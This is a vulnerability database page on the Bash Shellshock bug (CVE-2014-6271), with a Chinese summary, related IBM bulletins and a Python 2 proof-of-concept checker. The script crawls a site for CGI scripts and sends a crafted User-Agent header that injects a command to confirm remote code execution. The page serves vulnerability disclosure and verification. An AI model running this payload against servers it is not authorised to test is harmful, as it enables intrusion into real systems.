Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Bash 4.3 远程命令执行漏洞 (破壳)

🗓️ 26 Sep 2014 00:00:00Reported by RootType 
seebug
 seebug🔗 www.seebug.org👁 2370 Views

Bash 4.3 远程命令执行漏洞(破壳)2014年9月24日发现的严重漏洞,远程攻击者可在受影响系统上执行任意代码

Related
Code
ReporterTitlePublishedViews
Family
IBM Security Bulletins		Security Bulletin: Vulnerabilities in Bash affect IBM Workload Deployer (CVE-2014-6271, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187, CVE-2014-6277, CVE-2014-6278)
15 Jun 201807:01
ibm
IBM Security Bulletins		Security Bulletin: Vulnerabilities in Bash affect SmartCloud Provisioning for IBM Provided Software Virtual Appliance
17 Jun 201822:30
ibm
IBM Security Bulletins		Security Bulletin: Vulnerabilities in Bash affect IBM SmartCloud Entry Appliance (CVE-2014-6271, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187, CVE-2014-6277, CVE-2014-6278)
19 Jul 202000:49
ibm
IBM Security Bulletins		Security Bulletin: Vulnerabilities in bash affect IBM Flex System Chassis Management Module (CMM)
31 Jan 201902:25
ibm
IBM Security Bulletins		Security Bulletin: Vulnerabilities in Bash affect certain Brocade products that IBM resells for use with IBM BladeCenter (CVE-2014-6271, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187, CVE-2014-6277, CVE-2014-6278)
31 Jan 201901:35
ibm
IBM Security Bulletins		Security Bulletins for IBM Tealeaf Customer Experience offerings
16 Jun 201819:35
ibm
IBM Security Bulletins		Security Bulletin: Vulnerabilities in Bash affect certain IBM N Series products (CVE-2014-6271, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187, CVE-2014-6277, CVE-2014-6278)
18 Jun 201800:08
ibm
IBM Security Bulletins		Security Bulletin: Vulnerabilities in Bash affect IBM Smart Analytics System 5600 (CVE-2014-6271, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187, CVE-2014-6277, CVE-2014-6278)
16 Jun 201813:58
ibm
IBM Security Bulletins		Security Bulletin: Vulnerabilities in Bash affect IBM PureData System for Operational Analytics (CVE-2014-6271, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187, CVE-2014-6277, CVE-2014-6278)
18 Oct 201903:50
ibm
IBM Security Bulletins		Security Bulletin: Vulnerabilities in Bash affect IBM Flex System Manager (FSM): (CVE-2014-6271, CVE-2014-6277, CVE-2014-6278, CVE-2014-7169, CVE-2014-7186, CVE-2014-7187)
31 Jan 201901:30
ibm
Rows per page

                                                #!/usr/bin/env python
# coding=utf-8

import re
import sys
import random
import string
import urllib2

from urlparse import urljoin
from urlparse import urlparse
from urlparse import urlunparse
from posixpath import normpath

from comm import cmdline
from comm import generic


poc_info = {
    'VulId': '1521',
    'Name': 'Bash 4.3 远程命令执行漏洞 POC',
    'AppName': 'Bash',
    'AppPowerLink': 'http://www.gnu.org/software/bash/',
    'AppVersion': '3.0-4.3',
    'VulType': 'Command Execution',
    'Desc': '''
            Bash 在解析环境变量时,会解析函数,同时可以运行函数后的语句,造成命令执行。
            ''',
    'Author': ['zhengdt @ knownsec'],
    'VulDate': '2014-09-24',
    'CreateDate': '2014-09-25',
    'UpdateDate': '2014-09-25',
    'References': ['https://www.invisiblethreat.ca/2014/09/cve-2014-6271/'],
    'Version': '1',
}

io_info = {
    'URL': '',
    'Mode': 'v',
    'Verbose': False,
    'Error': '',
    'Status': 0,
    'Result': {}
}


def main(io_info):
    url = io_info.get('URL', '')
    mode = io_info.get('Mode', 'v')
    verbose = io_info.get('Verbose', False)
    headers_fake = {}

    vul_url = None

    if mode == 'v' or mode == 'a':
        try:
            vul_url = get_url_need(url)
            if not vul_url.endswith('.cgi') and not vul_url.endswith('.sh'):
                io_info['Error'] = '%s - no vul url' % url
                return 

            if verbose:
                print '[*] %s - Requesting target url ...' % vul_url
            random_str = ''.join(random.sample(string.letters+string.digits, 50))
            headers_fake['User-Agent'] = '() { :; }; echo; echo X-Bash-Test: %s' % random_str 
            
            try:
                response = urllib2.urlopen(urllib2.Request(vul_url, headers=headers_fake))
                response = response.read()
            except urllib2.HTTPError, e:
                response = e.data

            if verbose:
                print '[*] %s - Check X-Bash-Test ...' % vul_url

            if 'X-Bash-Test: %s' % random_str == response.split('\n')[0]:
                io_info['Status'] = 1
                io_info['Result']['VerifyInfo'] = {}
                io_info['Result']['VerifyInfo']['URL'] = vul_url

        except Exception, e:
            io_info['Error'] = '[*] %s' % str(e)
            return


def get_url(url):
    try:
        return urllib2.urlopen(url).url
    except urllib2.HTTPError:
        return url


def fix_url(url):
    if not url.startswith('http'):
        url = 'http://%s' % url
    return url


def get_url_need(url):
    url_need = None

    url = fix_url(url)

    if url.endswith('.cgi') or url.endswith('.sh'):
        url_need = url
        return url_need

    url = get_url(url)
    url_need = get_link(url)

    if not url_need:
        #print '[*] get url need error'
        url_need = url

    info = url_need
    #print info
    return info


def get_link(url):
    rnt = ''
    try:
        page_content = urllib2.urlopen(url).read()
        match = re.findall(r'''(?:href|action|src)\s*?=\s*?(?:"|')\s*?([^'"]*?\.(?:cgi|sh|pl))''', page_content)
        for item_url in match:
            if not item_url.startswith('http'):
                item_url = getAbsoluteURL(url, item_url)
            if not is_url_exist(item_url):
                continue
            if isSameDomain(item_url, url):
                rnt = item_url
                break
        return rnt
    except Exception, e:
        #raise e
        return rnt


def getAbsoluteURL(base, url):
    url1 = urljoin(base, url)
    arr = urlparse(url1)
    path = normpath(arr[2])
    return urlunparse((arr.scheme, arr.netloc, path, arr.params, arr.query, arr.fragment))

def is_url_exist(url):
    try:
        urllib2.urlopen(url)
    except urllib2.HTTPError, e:
        return not e.code == 404
    return True


def isSameDomain(url1, url2):
    return True
    try:
        if urlparse(url1).netloc.split(':')[0] == urlparse(url2).netloc.split(':')[0]:
            return True
        else:
            return False
    except Exception, e:
        return False


if __name__ == "__main__":
    cmdline.main(io_info, usage='', argvs=[])
    if io_info['Verbose']:
        print '\n[*] Init ...\n'
    main(io_info)
    print generic.output(io_info)

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
26 Sep 2014 00:00Current
8High risk
Vulners AI Score8
EPSS0.9422
bash 4.3远程命令执行破壳漏洞安全漏洞远程攻击环境变量漏洞验证cve-2014-6271cve-2014-7169cve-2014-7186cve-2014-7187
2370